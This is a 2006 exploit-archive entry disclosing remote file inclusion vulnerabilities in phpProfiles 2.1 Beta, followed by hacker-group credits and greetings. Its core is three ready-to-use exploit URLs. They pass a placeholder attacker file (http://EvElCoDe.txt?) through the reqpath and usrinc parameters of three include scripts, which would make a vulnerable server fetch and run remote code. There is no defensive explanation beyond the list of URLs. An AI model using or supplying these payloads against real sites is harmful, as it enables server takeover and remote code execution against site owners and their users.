id: 1094
date: 10/30/2006
title: phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities
author: v1per-haCker
cves: 

=================================================================
phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities
=================================================================



#==================================================================
#  phpProfiles (RFI)
#==================================================================
# Info:-
#
# Scripts: phpProfiles
# Version : v.2.1 Beta
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/users/include/body.inc.php?reqpath=http://EvElCoDe.txt?
#http://localhost/path/users/include/body_blog.inc.php?reqpath=http://EvElCoDe.txt?
#http://localhost/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team               >>      www.xp10.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org
#
#Greetz to :    | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |
#               | Jean | CoDeR |
=========================================================================


#  0day.today [2023-03-27]  #